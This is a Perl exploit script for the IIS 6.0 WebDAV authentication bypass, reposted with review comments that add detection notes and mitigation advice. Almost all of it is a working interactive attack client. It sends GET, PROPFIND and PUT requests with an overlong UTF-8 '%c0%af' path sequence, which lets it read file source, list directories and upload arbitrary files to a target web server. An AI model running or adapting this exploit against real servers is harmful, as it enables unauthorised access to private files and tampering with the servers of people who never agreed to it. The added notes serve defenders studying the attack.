Another Perl exploit for the IIS 6.0 WebDAV bug
Versi lain dari exploit untuk bug IIS 6.0 WebDAV Remote Authentication Bypass, juga ditulis dalam bahasa Perl, oleh ka0x (ka0x01[alt+64]gmail.com).
#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
#
# Overview (review notes):
#   Interactive client. For every command typed at its prompt it opens a new
#   TCP connection to <host> on $port and sends one request for <path>:
#     source -> GET with a "Translate: f" header
#     path   -> PROPFIND
#     put    -> PUT of a local file to "<path>my_file.txt"
#   Before each request the first "/" in <path> is rewritten to "%c0%af/".
#   "%c0%af" is an overlong UTF-8 encoding of "/".
#
# Detection notes, taken from the requests built below:
#   - request lines containing "%c0%af", especially with PROPFIND or PUT;
#   - GET requests carrying "Translate: f";
#   - PUT requests whose target ends in "my_file.txt" with
#     Content-Type text/xml;
#   - a PROPFIND that declares "Content-Length: 0" yet is followed by an XML
#     body, and the unspaced header "Connection:close".
# Mitigation is on the server side: apply the vendor's fix for this WebDAV
# issue and turn WebDAV off where it is not required.
#
# NOTE(review): the page this listing came from collapsed the script onto one
# line; line breaks here are restored, and the exact line layout of the usage
# banner is a reconstruction.

use IO::Socket ;

# Positional arguments: target host and the path to request.
my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port

# Print the banner and exit when the second argument is missing (or false).
&usage unless $ARGV[1] ;

# Normalise the arguments: drop a leading "http://" from the host and a single
# leading "/" from the path (the request lines below add their own "/").
$host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
$path =~ s/\/// if(substr($path, 0,1) eq '/');

# _file(NAME): read a local file and return its content as one string.
# Dies with the OS error text if the file cannot be opened.
# NOTE(review): this is a two-argument open on a bareword handle, so the name
# typed by the operator is parsed by Perl for mode characters. $file and $cont
# are undeclared package globals; $cont is appended to and never cleared, so a
# later call returns earlier content followed by the new file.
sub _file {
    $file = shift ;
    open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
    while( <FILE> ){
        $cont .= $_ ;
    }
    close(FILE) ;
    return $cont ;
}

print "write 'help' for get help list\n";

# Command loop. The socket is opened before the command is read, so every
# prompt (including 'help', 'quit' and unrecognised input) produces a TCP
# connection to the target, whether or not a request is then sent on it.
while( 1 ) {
    my $sock = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
    print "\$> ";
    chomp( my $option = <STDIN> ) ;
    last if $option eq 'quit' ;

    if($option eq 'source') {
        # Rewrites the first "/" of $path to "%c0%af/". $path is modified in
        # place, and the same substitution runs again on every later command,
        # so logged paths may carry the sequence more than once.
        $path =~ s/\//%c0%af\// ;
        # GET with "Translate: f"; the response is echoed to STDOUT as-is.
        print $sock "GET /".$path." HTTP/1.1\r\n" ;
        print $sock "Translate: f\r\n" ;
        print $sock "Host: ".$host."\r\n" ;
        print $sock "Connection: close\r\n\r\n" ;
        while(<$sock>){
            print $_ ;
        }
        close($sock) ;
    }
    elsif($option eq 'path') {
        $path =~ s/\//%c0%af\// ;
        # PROPFIND on the rewritten path; the response is echoed to STDOUT.
        print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ;
        print $sock "Host: ".$host."\r\n" ;
        print $sock "Connection:close\r\n" ;
        print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
        # NOTE(review): the header declares a zero-length body although an XML
        # propfind document is written right after the blank line.
        print $sock "Content-Length: 0\r\n\r\n" ;
        print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;
        while(<$sock>){
            print $_ ;
        }
        close($sock) ;
    }
    elsif($option eq 'put') {
        $path =~ s/\//%c0%af\// ;
        # Prompt for a local file name and load it through _file().
        print "[*] Insert a local file (ex: /root/file.txt): " ;
        chomp( $local = <STDIN> ) ;
        $file_l = _file( $local ) ;
        # The remote name is fixed: "my_file.txt" appended directly to $path.
        print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
        print $sock "Host: ".$host."\r\n" ;
        print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
        print $sock "Connection:close\r\n" ;
        # Content-Length is the length of the file content; the write below
        # also appends "\r\n" after it.
        print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
        print $sock $file_l,"\r\n" ;
        while(<$sock>){
            print $_ ;
        }
        close($sock) ;
    }
    elsif($option eq 'help') {
        # Local help text only; nothing is written to the socket here.
        print "\n\t\t- OPTIONS -\n\n\n" ;
        print "\thelp\t\tgive this help list\n" ;
        print "\tsource\t\tget file content\n" ;
        print "\tpath\t\tget directory contents\n" ;
        print "\tput\t\tput file\n" ;
        print "\tquit\t\texit exploit\n\n" ;
    }
}

# usage(): print the banner and usage text, then exit.
# The heredoc terminator is single-quoted, so "$0" is printed literally and is
# not replaced by the script name.
sub usage {
    print << 'EOH' ;
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
$ written by ka0x <ka0x01[at]gmail.com>
$ 25/05/2009
usage:
perl $0 <host> <path>
example:
perl $0 localhost dir/
perl $0 localhost dir/file.txt
EOH
    exit;
}